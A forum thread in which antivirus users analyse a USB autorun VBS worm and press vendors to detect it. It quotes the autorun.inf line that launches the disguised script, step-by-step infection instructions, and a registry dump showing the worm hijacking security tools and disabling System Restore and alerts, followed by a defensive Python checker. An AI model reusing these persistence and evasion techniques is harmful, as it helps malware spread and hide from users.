New VBS virus, and OMG it is kind of hard to see it ;)

Yesterday my friends and I had to study for a programming test, "matlab2010", so we came to my home and executed all the Simulink and GUI things. After that one of my friends asked me to copy Dr.Web CureIt to his flash memory, so I inserted it in my 7 PC and copied Dr.Web CureIt and other programs. By the way, I found an autorun.inf file in the flash memory; I opened it and found the following code:


[autorun]
shellexecute=Wscript.exe /e:vbs Thambs.db

What is that? I noticed the Thumbs file, but it is a normal file created by Explorer when you open folders that contain images; that is what I thought at that second, so I copied the files to my flash as normal. Today I analyzed the samples on my real testing machine and I was shocked to see obfuscated VBS code in the file. It was not "Thumbs.db" BUT "Thambs.db". avast doesn't detect it, so I edited the text and tried to create a new file; at that point avast detected it as VBS:Malware-Gen.

What makes me sad is that neither avast nor Norton detect the original file as a virus, so in my sandbox the virus loaded and worked with no detection from avast; on the contrary, avast scanned the created autorun.inf file a lot and found nothing. Since the virus is not that technologically advanced, it creates autorun.inf every second "or more" in the fixed and USB drives c: d: e: …

The file has been sent to avast with a link to this thread by email and by the chest function.

Good way to learn things, SH. But, be careful you might infect your computer.

Those things run in my blood, and when you have 4 PCs you don't even think about infections. I wish avast would add detection for that.
By the way, I have a suspicion about my blood: maybe it is C++, not B- :wink:

lol, this makes me want to get a computer that isn't good for much and download different kinds of viruses on it (unplugging the network cable after it's done), see how they work and what they do, use an antivirus probably to get rid of it, or just wipe the whole thing and start over. That's a good way to learn, I'd say. I'm also gonna test how well antiviruses spot them.

I updated avast and no detection yet.
Other companies added a signature. :frowning:
Merry Christmas
http://www.virustotal.com/file-scan/report.html?id=18d9a33928ef1e5432fc2ed5372d8c9e785eef5906999a57575cf097dca6f080-1293278193

Norman analysis will add detection

autorun.inf : Processed - INF/Autorun.II
Thambs.db : Processed - Slogod.B

Thanks, BUT still no detection from avast :frowning:

13/43: BUT NOT AVAST
http://www.virustotal.com/file-scan/report.html?id=18d9a33928ef1e5432fc2ed5372d8c9e785eef5906999a57575cf097dca6f080-1293376095

And this is the result from Avira:

26000665 autorun.inf 106 Byte CLEAN
26000666 Thambs.db 78.63 KB CLEAN

So what to believe?

Believe what you see in my image or what you can see from your own analysis. I don't know if you are a VBS geek, but any script programmer could see the bad payload in the file.
Until now no detection, and its autorun file also could not be detected by avast.

2 days and no detection yet :frowning: :o
The sample is not easy to detect by a normal user, so please publish a signature for it, thanks.

This file should be detected as malware; after running the autorun as an autorun in the drive, it did almost all the basic actions of a malware, like disabling Task Manager, disabling Windows Update, etc.

This is exactly what I did:

  • Extract the archive, copy those files (autorun.inf and Thambs.db) to the root of C: (I tried on both Windows XP SP3 and Windows 7 Ultimate, so it must work in other Windows versions too)
  • Log off and log in, or restart explorer.exe
  • Double-click on C: (if you right-click, you should see you have Autorun in the drive now; you know better than me :wink: )
  • Now Windows Update will be disabled (Windows Security Center will alert you), you cannot open Task Manager, nor regedt32.exe, and…

This is part of the registry changes after the run:

[HKEY_USERS\hive\machine\software\Classes\Vbsfile]
"FriendlyTypeName"="Fichier de la base de données"

[HKEY_USERS\hive\machine\software\Classes\Vbsfile\DefaultIcon]
@="shell32.dll,-154"

[HKEY_USERS\hive\machine\software\Classes\exefile\shell\Ouvrir avec...]

[HKEY_USERS\hive\machine\software\Classes\exefile\shell\Ouvrir avec...\command]
@="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\Classes\exefile\shell\Scan with Anti-Trojan]

[HKEY_USERS\hive\machine\software\Classes\exefile\shell\Scan with Anti-Trojan\command]
@="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\Policies\Microsoft\Windows NT\SystemRestore]
"DisableSR"=dword:00000001

[HKEY_USERS\hive\machine\software\Policies\Microsoft\Windows\Installer]
"LimitSystemRestoreCheckpointing"=dword:00000001

[HKEY_USERS\hive\machine\software\microsoft\Security Center]
"AntiVirusOverride"=dword:00000001
"AntiVirusDisableNotify"=dword:00000001
"FirewallDisableNotify"=dword:00000001
"FirewallOverride"=dword:00000001

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutorunRemover.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avira.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\GenProc.bat]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\GenProc.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\HJTInstall.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\LaunchU3.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Opera.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSIT.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rmvtrjan.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDFix.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Safari.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Startup CP.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trjscan.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\avant.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\combofix.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwtsn32.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwin.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\flock.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\malwarebytes-anti-malware_malwarebytes_anti-malware_1.44_francais_215092.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mvyA.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\navigator.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\rav.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\usbfix.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000001
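A defender's check over the kind of registry changes listed above, as an added example that is not from the thread or any of its posters: it parses text in Windows .reg export format (a constructed excerpt modelled on the keys above, not the real dump) and flags Image File Execution Options "Debugger" entries, which redirect the named program to another executable, together with the Security Center and System Restore values this sample sets.

```python
import re

# Constructed .reg excerpt modelled on the keys in the thread's dump
# (hypothetical sample for the check below, not the original dump).
SAMPLE_REG = r'''
[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\system32.db"

[HKEY_USERS\hive\machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe]
"Debugger"="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"

[HKEY_USERS\hive\machine\software\microsoft\Security Center]
"AntiVirusOverride"=dword:00000001
"FirewallDisableNotify"=dword:00000001

[HKEY_USERS\hive\machine\software\Policies\Microsoft\Windows NT\SystemRestore]
"DisableSR"=dword:00000001
'''

# DWORD value names from the dump that weaken protections when set to 1.
SUSPICIOUS_DWORDS = {"AntiVirusOverride", "AntiVirusDisableNotify",
                     "FirewallDisableNotify", "FirewallOverride",
                     "DisableSR", "LimitSystemRestoreCheckpointing"}


def parse_reg(text):
    """Yield (key_path, value_name, raw_value) triples from .reg text."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]                      # new key section
        elif key and line.startswith('"'):
            m = re.match(r'"([^"]+)"=(.*)', line)  # "name"=value
            if m:
                yield key, m.group(1), m.group(2)


def find_hijacks(text):
    """Return findings as (kind, subject, detail) tuples."""
    findings = []
    for key, name, value in parse_reg(text):
        leaf = key.rsplit("\\", 1)[1]
        if "image file execution options\\" in key.lower() and name == "Debugger":
            # .reg strings escape backslashes as \\; undo that for the report.
            target = value.strip('"').replace("\\\\", "\\")
            findings.append(("IFEO hijack", leaf, target))
        elif name in SUSPICIOUS_DWORDS and value.lower() == "dword:00000001":
            findings.append(("security setting disabled", leaf, name))
    return findings
```

On a live system the same check can be run over the output of `reg export` for the HKLM and HKCU hives; a Debugger value pointing at a script host or at another browser is the tell-tale here.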

One file is detected by avast! now

VirusTotal - autorun.inf - 9/43
http://www.virustotal.com/file-scan/report.html?id=50b555b8aa1cb3a2d75354f9b95da8a5bfd19c1ad6cb29ee4b96594654134ad0-1293488028

VirusTotal - Thambs.db - 16/43
http://www.virustotal.com/file-scan/report.html?id=18d9a33928ef1e5432fc2ed5372d8c9e785eef5906999a57575cf097dca6f080-1293488161

Deciding about adding Autorun.inf is not easy; logically it's just text which 'calls' malware, but in practice, without a definition for it, it's difficult for a newbie to clean their computer (e.g. solve Autorun in their USB drive or partition).
Anyway, it's a command which calls a bad thing and can never be used for good, so better detect it!

After contacting Avira with a number of mails:

Thank you for your recent inquiry.

We found a new virus in the attachment you have sent us.
The pattern recognition will be integrated in one of our next updates.
The pattern recognition of the virus will be detected as VBS/Flesh.A.

We thank you for your assistance.

@ Omid Farhang & Pondus:
Thank you both for your work. Yesterday milos PMed me and said the virus will be detected now, so thank you everybody. It is not that easy to remove by a newbie or even a medium user.

@Omid:
From where did you get your sample? ???

Best regards.

superhacker